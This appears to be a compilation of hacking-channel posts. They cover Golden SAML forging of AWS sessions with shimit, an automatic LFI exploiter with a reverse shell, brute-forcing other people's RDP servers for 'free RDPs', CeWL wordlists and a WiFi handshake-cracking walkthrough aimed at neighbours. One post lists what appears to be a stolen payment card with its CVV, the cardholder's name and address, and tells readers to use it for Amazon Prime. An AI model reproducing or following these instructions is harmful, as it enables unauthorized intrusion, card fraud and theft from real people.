▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A tool that implements the Golden SAML attack
> shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider
> After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using the golden SAML.
pinterest.com/undercode_Testing

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

2) git clone https://github.com/cyberark/shimit

3) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

4) idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust

pk - Private key file full path (pem format)

c - Certificate file full path (pem format)

u - User and domain name e.g. domain\username (use \ or quotes in *nix)

n - Session name in AWS

r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.

id - AWS account id e.g. 123456789012

5) Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o - Output encoded SAMLResponse to a specified file path

6) Load SAMLResponse from file
python .\shimit.py -l saml_response.xml

🦑tested by undercode

> TERMUX-LINUX

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
> termux root -linux -windows-osx
t.me/undercodeTesting

🦑FEATURES :

Works with Windows, Linux and OS X

Automatic Configuration

Automatic Update

Provides 8 different Local File Inclusion attack modalities:

/proc/self/environ
php://filter
php://input
/proc/self/fd
access log
phpinfo
data://
expect://

Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other without you having to do anything (except for providing, at the beginning, a list of paths to scan, which if you don't have you can find in this project directory in two versions, small and huge).

Tor proxy support

Reverse Shell for Windows, Linux and OS X

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/D35m0nd142/LFISuite

2) cd LFISuite

3) run python socks for linux and the script or run .exe for windows

4) When you got a LFI shell by using one of the available attacks, you can easily obtain a reverse shell by entering the command "reverseshell" (obviously you must put your system listening for the reverse connection, for instance using "nc -lvp port").

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑top carding How to Crack a VPS/RDP ( GET FREE RDP'S ) :

Hello, today we'll be learning how to crack ez VPS/RDP's (Remote Desktop Connection). Follow each step and get yourself free RDP's instead of paying
fb.com/undercodeTesting

🦑 Tools Needed:
Kport SCANNER

( Download :
https://anonfile.com/w699R4w9bd/KPortScan_3.0_rar

DUBrute
(Download: https://dailyuploads.net/mgvxio5yssx6 )
IP adress list

https://www.countryipblocks.net/acl.php
––––––––––
🦑 STEPS:
1] Download DUBrute & KPORT SCANNER from above links and install them

2] Go here
https://www.countryipblocks.net/country_selection.php

And copy all ip address & paste in kport scan. After clicking start button don't change anything

3] Find some ips in count of goods. They will automatically be saved in results.

4] Now open DUBrute
- Click on Generation, another window will open.
Now this step is pretty self explanatory, You must load each of the .txt files in its field.
- For IP click on File IP and browse to the results.txt file you saved in kport scan folder.
- For Login click on File Login and browse to the DUBrute Folder.
You'll find a .txt file named Login. Select that file. For Password click on File Pass and again browse to the DUBrute Folder.
You'll find a .txt file named œPass. That is the file you need.

5] When you get some Good Ip's, it's time to connect to the VPS/RDP.The working IP's are stored in a .txt file named œGood in the DUBrute folder.
They are in the format 111.222.333.444@username:password.
––––––––––
Now you have your FREE VPS/RDP, Enjoy

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated GEnerate a custom wordlist-bruteforce with more speed and sucess :
t.me/undercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/digininja/CeWL

2) cd CeWL

3) ./cew.rb

CeWL 5.4.2 (Break Out) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>

OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-o, --offsite: Let the spider visit other sites.
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.

Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.

Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.

Headers
--header, -H: In format name:value - can pass multiple.

<url>: The site to spider.

🦑Running CeWL in a Docker container
To quickly use CeWL on your machine with Docker, you have to build it :

1) Build the container :
docker build -t cewl .

2) Container usage without interacting with local files :
docker run -it --rm cewl [OPTIONS] ... <url>

3) Container usage with local files as input or output :
# you have to mount the current directory when calling the container
docker run -it --rm -v "${PWD}:/host" cewl [OPTIONS] ... <url>

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 USE FOR LEARN NOT FOR STEAL

🦑 5258952501098909 10/21 307 Sehaki Kamal ADDRESS Vancouver BC J8T 3T8 CANADA


Use any vpn
Location Canada
Make Amazon prime
Enjoy
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hack Wifi In 15 Mintues‼️
t.me/undercodeTesting


🦑 𝕃𝔼𝕋 𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Download kali linux - https://www.kali.org/downloads/
1.1 Install Kali Linux on a USB flash drive or virtual machine
1.3 Run from a USB flash drive or virtual machine under Kali
2. Open the console
2.1 We write: iwconfig and check if our LAN card! If you have problems at this moment (this will not happen with laptops), then you need to buy this card. For 300 rubles you can take a usb tplink card with alik and everything will be in chocolate.
2.2 Now we turn on the monitoring mode: airmon-ng start wlan0 (vlan0 is the value from the parameters of the network card, you may have a slightly different one, for example mon0)
2.3 Now you need to scan: airodump-ng wlan0
2.4 Here we will see a list of Wi-Fi networks within the radius of our device, it depends on the network card. Here we need to select the target of the attack, we choose according to your taste, I usually take the one who has the best signal (The signal level is determined by the abbreviation pwr)
2.5 Now we need to press ctrl + c and stop scanning
2.6 Select the victim and write: airodump-ng --bssid ( here we write the bsidey of the victim's router, you see it above) --channel (here we write the channel, it is indicated as ch, for example 1 or 8) -w / tmp / nazvanie (this is the path where the final file and name will be) wlan0
2.7 At the very bottom we see those who are connected to the network, we select the one with a larger number in the Frames value (it is more active)
3. Open another console and write: aireplay-ng -0 1 (1 - this is the number of deauthorization packages, immediately put 50 and wait) -a (here we write the router’s sideside, we see it in the very top line where its characteristics: level signal, channel, etc.) -s (poppy address of the user we are attacking, you can find out his poppy under STATION) wlan0
3.1 We wait until there is an inscription with a handshake in the first console, it will be indicated there for a while, it will be at the top. We do this command in the second console until the handshake passes. If it doesn’t work at all, then we write this command instead of the one: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one (this is for Android devices), you can still deauthorize the entire network at once aireplay-ng --deauth 5 -a (here you register the router poppy) wlan0
4. When we received the handshake, we go along the path that we indicated and:
4.1 Decrypt this hash ourselves, give people who can do it
4.2 Turn to the https://xsrc.ru service (not ads) and throw the hash here, it quickly finds ( I have in a couple of seconds), it may be longer, but obviously faster than on my laptop in 2009: D
After decryption, you will receive a notification letter in the mail, and to get the password you need a key, 1 costs 100 rubles, the more - the cheaper. This is the only negative of this method, but I prefer it. After purchasing the key, it will come to the post office, then enter it on the site and you're done.
That's ready, then with ours, now ours! we do what we want with the network: we replace the DNS, listen to traffic or just watch movies and sit on our favorite forum :)

http://wpa-sec.stanev.org/ Service for decrypting hashes for free,

🦑 A few words about security at work:
If you use this method in your neighbors, at school, university, and other simple places - it does not matter. If you go to the office, company, or any place that has important data - get ready. Learn basic security concepts in kali linux. Although vryatli in + - a serious company has the simplest protection that can be opened in this way. Usually. They have data going through their server, which needs to be broken in order to get a password.
On security, when you are sitting in a hacked / free wifi point, I’ll tell you a couple of rules:
Use a VPN
Try not to log in to important services
Or use a VPN + TOP bundle
Or instead of vpn you can use ssh tunnel.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁